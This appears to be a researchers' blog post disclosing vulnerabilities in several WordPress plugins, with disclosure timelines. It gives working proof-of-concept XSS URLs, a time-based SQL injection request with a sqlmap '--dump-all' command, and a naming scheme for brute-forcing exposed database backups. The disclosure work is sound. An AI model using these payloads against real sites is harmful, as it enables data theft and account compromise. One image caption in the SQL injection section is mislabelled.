WordPress Plugin Bug Hunting – Part 1

Myself and Guy recently decided to once again attempt to step into the world of Bug Hunting. Our previous attempts had been unsuccessful, and we decided that working together could help prevent the inevitable crushing “I can’t do this” feeling that I’m sure most beginners get.

We spent the next two weeks trawling plugins, documenting results and writing a very helpful bug hunting tool (more on this in the next post) and are pleased to report the following security vulnerabilities. With the biggest vulnerability being a sensitive information disclosure (exposed backups) vulnerability in WP File Manager, which currently has 600,000 active installs and 6.2 million total downloads.

———————————————————————————————————————————————————————————————————————–

CVE-2020-24312 – WP File Manager v6.4 – Sensitive file disclosure (backups leak) 

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/wp-file-manager/
Vulnerable Version: 6.4 and less
Total Downloads: 6.2 Million
Active Installations: 600,000+
Author: mndpsingh287

Description

Backups made with this tool do not correctly restrict access to the backed up files. This leads to bruteforceable backup files, or in some cases, directory listable and completely exposed which is demonstrated below.

Highlights where backups are stored
Highlights where backups are stored
Demonstrates a PoC - retrieving the backed up SQL database without any cookies. This shows that authentication is not required to view these files and that the backup is publicly accessible.
Demonstrates a PoC – retrieving the backed up SQL database without any cookies. This shows that authentication is not required to view these files and that the backup is publicly accessible.

 

An attacker can easily verify that the WP File Manager plugin is installed by going to /wp-content/uploads/wp-file-manager-pro/fm_backup This page will return a 200 response code if it has been installed, and a 404 if not. Alternatively, it’s possible to brute force the names of the backup files. With the name structure as follows backup_year_month_day_hour_minute_second_random-db.sql.gz A random number between 0 – 9999 is appended to the end of the date/time stamp.

Demonstrates confirming WP File Manager is installed - allows easy identification of potentially vulnerable websites.
Demonstrates confirming WP File Manager is installed – allows easy identification of potentially vulnerable websites.

 

 

Google dork results
Google dork results
Directory listing of exposed backups, including a full SQL database
Directory listing of exposed backups, including a full SQL database

 

Timeline

11 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
11 Jun 2020 – Reply from Plugin Security team to clarify plugin
18 Jun 2020 – Reply from plugin Security team to say they’re looking into it
18 Jun 2020 – Patch released
10 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-24314 – RSS Feed Widget v2.7.9 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/rss-feed-widget/advanced/
Vulnerable Version: 2.7.9 and less
Total Downloads: 164,000
Active Installations: >5000
Author: Fahad Mahmood
Link to vulnerable version: https://downloads.wordpress.org/plugin/rss-feed-widget.2.7.9.zip

Description

The t GET parameter in settings.php does not sanitize user input before reflecting the value back to the user. After closing the input tag with 1″> in the t parameter, we can inject arbitrary html tags, including the <script> tags to execute JavaScript code. The result is a reflective XSS vulnerability that can be seen in the following example

Reflected XSS in the 't' GET parameter
Reflected XSS in the ‘t’ GET parameter
POC
/wp-admin/admin.php?page=rfw_options&t=1"><script>alert("xss")</script>
Vulnerable Code

Numerous vulnerable lines exist in settings.php where the ‘t’ GET parameter is echoed out to the screen without escaping user input. This occurs once for each tab in application.

Example of one of the unsanitized uses of the t param
Example of one of the non sanitized uses of the t param
Timeline

20 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
23 Jun 2020 – Reply from Plugin Security team that they’re investigating
23 Jun 2020 – Patch released
10 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-24313 – Ultimate Appointment Scheduling v1.1.9 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/ultimate-appointment-scheduling/
Vulnerable Version: v1.1.9 and less
Total Downloads: 37,000
Active Installations: >800
Author: Etoile Web Design
Link to vulnerable version: https://downloads.wordpress.org/plugin/ultimate-appointment-scheduling.1.1.9.zip

Description

The Appointment_ID GET parameter in AppointmentDetailsPage.php is vulnerable to reflected XSS attacks

Reflected XSS in appointment ID
Reflected XSS in appointment ID
POC
/wp-admin/admin.php?page=EWD-UASP-options&Action=EWD_UASP_AppointmentDetails&Selected=Appointment&Appointment_ID=1"><script>alert(1)</script>
Vulnerable Code

The vulnerable code lies at line 28 of the /html/AppointmentDetailsPage.php where the Appointmentment_ID GET parameter is echoed directly out into an input tag without being escaped.

Appointment_Id parameter being echoed without sanitization
Appointment_Id parameter being echoed without sanitization
Timeline

19 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
19 Jun 2020 – Reply from Plugin Security team that they’re investigating
?? Jun 2020 – Patch released
10 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-24315 – WordPress Poll v36 – Authenticated SQLI

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/cardoza-wordpress-poll/
Vulnerable Version: v36 and less
Total Downloads: 99,434
Author: Vinoj Cardoza

Description

Within the Cardoza WordPress Poll plugin, the pollid POST parameter is vulnerable to authenticated SQL injection when submitting a poll deletion request.

Reflected XSS in appointment ID
Reflected XSS in appointment ID
POC
POST /wp-admin/admin-ajax.php?nonce=5be849732a HTTP/1.1
Host: headache.zeroaptitude.com
Connection: close
Content-Length: 66
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://headache.zeroaptitude.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://headache.zeroaptitude.com/wp-admin/admin.php?page=cwp_poll
Accept-Encoding: gzip, deflate
Accept-Language: en-AU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <Insert your cookies here>

action=deletepoll&pollid=(SELECT 2822 FROM (SELECT(SLEEP(5)))gsJu)

Or using SQLMap

python sqlmap.py -r req.txt -p pollid --risk=3 --level=5 --dbms=mysql --technique=T --dump-all
SQLMap Confirming SQLI
SQLMap Confirming SQLI
Timeline

21 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
23 Jun 2020 – Reply from Plugin Security team that they’re investigating
23 Jun 2020 – Plugin closed (not likely to be patched)
10 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-24316 – Admin Menu v1.1 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/admin-menu/
Version: 1.1
Total Downloads: 2592
Author: Rednumber

Description

The role GET parameter used by Admin Menu does not correctly sanitize user input before reflecting the parameter back to the user. This results in a reflective XSS vulnerability that can be seen in the following example

XSS Payload execution from the 'role' GET parameter
XSS Payload execution from the ‘role’ GET parameter
POC
http://<wordpress site>/wp-admin/admin.php?page=admin-menu-pro&role=<script>alert(String.fromCharCode(88,83,83))</script>
Vulnerable Code

The vulnerable code can be found in the admin-menu/class/settings.php file on lines 81 and 176.

Line retrieves the role GET parameter into the variable $role, which is never sanitized and finally echoed back out to the user on line 176.

 

Line 81 'role' parameter being read into the $role variable without sanitizing user input
Line 81 ‘role’ parameter being read into the $role variable without sanitizing user input
$role parameter being echoed back to the user after having never been sanitized
$role parameter being echoed back to the user after having never been sanitized

 

Timeline

15 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
17 Jun 2020 – Plugin closed for downloads
18 Jun 2020 – Reply from Plugin Security team that they’re investigating
8 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

Very Simple Quiz v1.0.0 – Stored XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/very-simple-quiz/
Version: 1.0.0
Total Downloads: 2706
Author: Brijesh

Description
Vulnerability 1

The first is the “Quiz Name” when creating a new quiz (or editing an existing quiz’s name). Entering XSS payloads within the quiz name will lead to execution when quiz administrators attempt to alter the quiz name in the future. Of note, since the stored quiz name is passed into the ‘edit_quiz_name’ GET parameter, we can also execute reflected XSS.

Preparing the first XSS vuln
Preparing the first XSS vuln
Clicking Edit Name executes the payload
Clicking Edit Name executes the payload
XSS Execution
XSS Execution

 

Vulnerability 2

The second XSS vuln exists in the “question” field within quizzes. The question field will be stored and executed straight away after the admin clicks “Add question”. The payload will also execute when an admin clicks “edit” on the quiz in the future and also when a user visits the quiz on any page its placed onto in WordPress.

Setting up the second stored XSS payload
Setting up the second stored XSS payload
Executing the payload as a logged in user
Executing the payload as a logged in user
Unauthenticated user executing payload
Unauthenticated user executing payload

 

vulnerability 3

The 3rd and 4th stored xss vulns both exist inside the “filter results” section of the quiz plugin. The “Result page shown” and “custom text to show on result page” boxes will be stored XSS payloads that will be executed when admins visit the “filter result” tab as well as when site users take the quiz and are redirected to the results page

Creating the 3rd and 4th Stored XSS
Creating the 3rd and 4th Stored XSS
Clicking either of those will execute the payload
Clicking either of those will execute the payload
XSS Execution
XSS Execution
Timeline

19 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
19 Jun 2020 – Plugin closed for downloads (unlikely to be ever fixed. It’s old)
19 Jun 2020 – Reply from Plugin Security team that they’re investigating
10 Aug 2020 – Public write up and CVE Submission

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *